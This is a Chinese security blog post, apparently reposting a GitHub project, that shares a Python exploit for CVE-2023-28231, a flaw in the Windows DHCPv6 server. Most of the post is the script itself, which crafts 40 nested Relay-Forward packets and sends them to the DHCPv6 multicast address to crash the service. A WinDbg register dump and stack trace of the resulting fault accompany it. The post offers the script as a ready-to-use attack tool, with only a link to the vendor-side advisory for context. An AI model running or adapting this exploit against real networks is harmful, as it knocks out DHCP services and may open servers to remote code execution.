DHCP服务器远程代码执行影响：从2008 R2 SP1到Server 2019

作者：Sec-Labs | 发布时间：2023-05-07 00:09:03
项目地址

https://github.com/glavstroy/CVE-2023-28231
CVE-2023-28231

DHCP服务器远程代码执行影响范围：从 2008 R2 SP1 到 Server 2019
EXP

win_dhcp_exploit.py
"""
Microsoft DHCPv6 Server - RelayForward
@w3bd3vil
0:024> r
rax=00000000ffff000c rbx=00000000000001a2 rcx=00000033ffcc0270
rdx=0000000000000000 rsi=00000000000001a2 rdi=00000138fba4c098
rip=00007ffa177aecc6 rsp=0000003179dffd00 rbp=0000000000000012
 r8=0000000000000020  r9=0000000000000000 r10=0000000000000004
r11=0000000000000246 r12=000000000000059c r13=0000000000000002
r14=00000138fba4d48c r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
dhcpssvc!ProcessRelayForwardMessage+0x346:
00007ffa`177aecc6 4c398c396a060000 cmp     qword ptr [rcx+rdi+66Ah],r9 ds:0000016c`fb70c972=????????????????
0:024> k
 # Child-SP          RetAddr               Call Site
00 00000031`79dffd00 00007ffa`177ae4a3     dhcpssvc!ProcessRelayForwardMessage+0x346
01 00000031`79dffda0 00007ffa`177b16e7     dhcpssvc!DhcpV6ProcessMessage+0x187
02 00000031`79dffe00 00007ffa`1779cbd5     dhcpssvc!DhcpV6ProcessPacket+0x77
03 00000031`79dffe50 00007ffa`24c94de0     dhcpssvc!ProcessingLoop+0x1c5
04 00000031`79dffeb0 00007ffa`25cfe3db     KERNEL32!BaseThreadInitThunk+0x10
05 00000031`79dffee0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b
https://www.zerodayinitiative.com/blog/2023/5/1/cve-2023-28231-rce-in-the-microsoft-windows-dhcpv6-service
"""
import socket

s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.bind(('2001:db8::f0c0:c671:3b26:e213', 547)) #LHOST
dest_addr = ('ff02::1:2', 547)

final_packet =  b'\x0c' #Relay-forw
# dhcpssvc!ProcessRelayForwardMessage+0x103:
# 00007ffa`177aea83 807d0120        cmp     byte ptr [rbp+1],20h ss:00000138`fba49ef1=21
final_packet += b'\x20'
final_packet += b'\x00'*16 #link-address
final_packet += b'\x00'*16 #peer-address

arre_packet = []
length_value = 0
for i in range(40):
    if i == 0:
        length_value += 40 + 4 + 56
    else:
        length_value += 40 + 4
    hex_length_value = length_value.to_bytes(2, 'big')

    # dhcpssvc!ProcessRelayForwardMessage+0x268:
    # 00007ffa`177aebe8 0f859c010000    jne     dhcpssvc!ProcessRelayForwardMessage+0x40a (00007ffa`177aed8a) [br=0]
    if i <= 8:
        hop_value = 0
    else:
        hop_value = i - 8
    hop_value = hop_value.to_bytes(1, 'big')

    packet =  b''
    packet += b'\x00\x09' #Relay Message
    packet += hex_length_value
    packet += b'\x0c' #Relay-forw
    packet += hop_value
    packet += b'\xff'*16 #link-address
    packet += b'\xff'*16 #peer-address
    packet += b'\x00\x12\x00\x02\x51\x80' #interface-id (probably not required)

    if i == 0:
        packet += b'\x00\x09' #Relay Message
        packet += b'\x00\x38' #Length
        packet += b'\x01\x91\xf7\xd9\x00\x01\x00\x0e\x00\x01\x00\x01\x2b\xe6\xb0\xc7\x56\x1f\xf0\x8f\x03\x85\x00\x06\x00' #SOLICIT
        packet += b'\x08\x00\x17\x00\x18\x00\x27\x00\x1f\x00\x08\x00\x02\x00\x00\x00\x03\x00\x0c\x5d\x0b\xdd\x07\x00\x00' #SOLICIT
        packet += b'\x0e\x10\x00\x00\x15\x18' #SOLICIT

    #print(packet.hex())
    arre_packet.append(packet)

#print(b''.join(arre_packet[::-1]).hex())
final_packet += b''.join(arre_packet[::-1])

s.sendto(final_packet, dest_addr)
print(f"Krash packet sent!")
s.close()
标签：工具分享, 漏洞分享, EXP脚本